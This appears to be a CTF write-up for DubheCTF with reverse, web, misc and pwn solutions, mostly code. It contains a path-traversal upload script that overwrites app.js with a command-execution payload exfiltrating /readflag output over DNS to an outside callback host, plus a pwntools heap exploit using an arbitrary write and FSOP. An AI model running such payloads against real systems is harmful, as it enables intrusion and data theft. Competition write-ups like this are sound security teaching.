           0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x36,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x31,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x41,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x30,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x45,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x44,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x34,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x33,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x33,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x46,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x43,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x31,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x33,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x44,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x36,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x43,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x32,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x33,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x42,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x44,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x33,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x44,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x46,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x38,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x46,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x33,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x46,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x41,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x31,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x41,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x39,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x42,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x44,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x43,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x46,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x35,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x44,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x30,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x31,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x31,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x38,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x35,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x31,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x42,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x45,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x34,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x30,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x39,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x39,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x36,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x42,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x46,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x39,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x35,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x45,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x36,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x44,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x34,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x32,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x39,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x45,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x46,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x45,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x3a,0x5c,0xb8,0x75,0x28,0xf2,0xb7,0x0,0xa8,0x2f,0xa,0x0,0x8d,0x1,0x0,]
def jud(aa):
    if aa<0x40:
        return aa-0x30
    else:
        return aa-0x37
def find_map(keyy):
    result=0
    for i in range(0,8,2):
        result=(result<<8)
        cnt1=(keyy >> 4*(7-i) & 0xf)
        cnt2=(keyy >> 4*(7-i-1) & 0xf)
        result=result|((jud(map[8*(48*cnt1+3*cnt2)])<<4)|jud(map[8*(48*cnt1+3*cnt2)+1]))
    return result

def left(k):
    tempa = ((k >> 8) & 0xffffffff) | ((k << 24) & 0xffffffff)
    tempb = ((k >> 14) & 0xffffffff) | ((k << 18) & 0xffffffff)
    tempc = ((k >> 22) & 0xffffffff) | ((k << 10) & 0xffffffff)
    tempd = ((k >> 30) & 0xffffffff) | ((k << 2) & 0xffffffff)
    return k ^ tempd ^ tempc ^ tempa ^ tempb

key=[0x9709FD63,0x114B4BFC,0x7184CB79,0x8A19BF94,0xA895E7A5,0xEB74D318,
     0xE96E65B4,0x8D975B69,0xC27637D1,0x985A109E,0x91787061,0x63E0EF04,
     0x16BEDE86,0xA32E8C81,0xDC88A458,0x7643DC82,0xD78059F3,0xCB301354,
     0x8408BBBE,0x2C0D5C07,0x2EA867C0,0xF8329491,0xD65718E8,0xC4E9E902,
     0xD7DE40B2,0xE97982D0,0x745D7594,0x24FDD746,0x047F97FC,0xC6AA0C4D,
     0xE93C5E6A,0x38DFE8A2,]

code=[0x6A61EF28,0x1A7473D6,0xB1B431D0,0x351F7E22,
      0x42CFB9D6,0xEC4E01EF,0x656D6CF5,0x20F14282,
      0x1C7061EB,0x843D5ABE,0x378B394C,0x4DC1298B,]
temp=[0x465E2F66,0x33343536,0x39303132,0x35363738]
for i in range(0,4):
    temp[i]=code[i+8]
for i in range(0,32):
    cntt=(temp[i+1])^temp[3+i]^temp[2+i]^key[31-i]
    cntt=find_map(cntt)
    cntt=left(cntt)
    cntt=cntt^temp[i]
    temp.append(cntt)
for i in range(len(temp)):
    print(hex(temp[i]),end=',')


aaaaa=[0xc0c0c0c,0xc0c0c0c,0xc0c0c0c,0x46554c7d,0x5f553533,0x485f3135,0x445f2433,0x4b5f344e,0x5f483030,0x7b564d54,0x65435446,0x44756268]
for i in range(0,12):
    kkk=aaaaa[11-i]
    print (chr ((kkk >> 24) & 0xff),end = '')
    print (chr ((kkk >> 16) & 0xff),end = '')
    print (chr ((kkk>>8) & 0xff),end='')
    print (chr ((kkk) & 0xff),end = '')

DubheCTF{VMT_H00K_4ND_$3H_15_U53FUL}

Web

Wecat

覆盖 js

1
2
3
4
5
6

import requests
import io
url = "http://1.95.54.149:36209/wechatAPI/upload/once?login"
files = {'file': b"require('child_process').exec('ping `/readflag`.p0gu.callback.red')"}
data={"postfix":"/../../app.js"}
r = requests.post(url=url,files=(files),data=data)


1

DubheCTF{Chatting_Online_May_Cost_You_8000}

Misc

ezPythonCheckin

反正不调用危险函数就行了,还有回显

1
2
3
4
5
6
7

with open('/flag', 'r') as f:
    flag = f.read()
    print(flag)


//base64
d2l0aCBvcGVuKCcvZmxhZycsICdyJykgYXMgZjoKICAgIGZsYWcgPSBmLnJlYWQoKQogICAgcHJpbnQoZmxhZyk=

cipher

双击挂载发现:\Users\Public 下有 flag.jpg

https://blog.csdn.net/shuaicenglou3032/article/details/131184510

E:\Users\test\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

找个注册码(

有师傅手解把注册表搞没了我不说是谁(

Pwn

BuggyAllocator

分配大于 0x80 大小的 chunk 时会正常分配 小于 0x80 的时候会根据 qword_404410 和 qword_404408 的情况视情况分配一个双份 20 倍大小的 chunk

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58

__int64 __fastcall sub_401586(unsigned __int64 a1, int *a2)
{
  __int64 result; // rax
  __int64 v3; // rax
  int i; // [rsp+14h] [rbp-3Ch]
  unsigned __int64 v5; // [rsp+18h] [rbp-38h]
  unsigned __int64 v6; // [rsp+20h] [rbp-30h]
  _QWORD *v7; // [rsp+28h] [rbp-28h]
  size_t v8; // [rsp+38h] [rbp-18h]
  _QWORD **v9; // [rsp+40h] [rbp-10h]
  _QWORD *v10; // [rsp+48h] [rbp-8h]

  v5 = a1 * *a2;
  v6 = qword_404410 - qword_404408;
  v7 = (_QWORD *)qword_404408;
  if ( v5 > qword_404410 - qword_404408 )
  {
    if ( v6 < a1 )
    {
      if ( v6 )
      {
        qword_404408 = qword_404410;
        v3 = sub_401BBE(v6);
        *v7 = qword_404420[v3];
        qword_404420[v3] = v7;
      }
      v8 = 2 * v5;
      for ( i = a1; i <= 128; i += 8 )
      {
        v9 = (_QWORD **)&qword_404420[sub_401BBE(i)];
        v10 = *v9;
        if ( *v9 )
        {
          *v9 = (_QWORD *)*v10;
          qword_404408 = (__int64)v10;
          qword_404410 = (__int64)v10 + i;
          return sub_401586(a1, a2);
        }
      }
      qword_404410 = 0LL;
      qword_404408 = (__int64)sub_401B44(v8);
      qword_404410 = qword_404408 + v8;
      result = sub_401586(a1, a2);
    }
    else
    {
      *a2 = v6 / a1;
      qword_404408 += a1 * *a2;
      result = (__int64)v7;
    }
  }
  else
  {
    qword_404408 += v5;
    result = (__int64)v7;
  }
  return result;
}

并在其中构造一个链表式的结构,根据地址写入内容

题目没开 pie,0x404420 开始会根据不同 <0x80 的 size 进行分配和记录

可以事先分配合适大小的 chunk 记录内容 然后当该 size 大小的 19 个 chunk 分配完后,就会在第 20 个 chunk 的位置的内容地址任意写 由此可以直接攻击 0x404420 的表结构任意写

然后接着按 stdout 打 io 泄露 libc 地址 获取到合适地址 异地可能会麻烦一些 需要多尝试几次

再申请一个大 chunk,这样可以在 libc 附近 省去找 heap 地址的麻烦 然后打 FSOP

(异地不能申请太大 内存有限制 本地和 docker 无所谓)

exp:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66

from pwn import*
from pwncli import*
#p=remote('1.95.11.97', 9999)
p=process('./pwn')
elf=ELF("./pwn")
libc=elf.libc
def debug():
    gdb.attach(p)
    pause()

context.log_level='debug'

def cmd(idx):
    p.sendlineafter(b' 2. Dealloc',str(idx))

def alloc(idx,size,cnt):
    cmd(1)
    p.sendlineafter(b'idx: ',str(idx))
    p.sendlineafter(b'size:',str(size))
    p.sendafter(b'Content: ',cnt)

def deallocc(idx):
    cmd(2)
    p.sendlineafter(b'idx:',str(idx))

alloc(33,0x1040,b'a'*0x700+30*p64(0x404440))
deallocc(33)
for i in range(20):
    alloc(i,0x68,b'a')
alloc(20,0x68,p64(0x404040)+p64(0x404440))
debug()
alloc(21,0x28,b'\x80')

alloc(22,0x28, p64(0xfbad3887)+p64(0)*3+p16(0xb000))


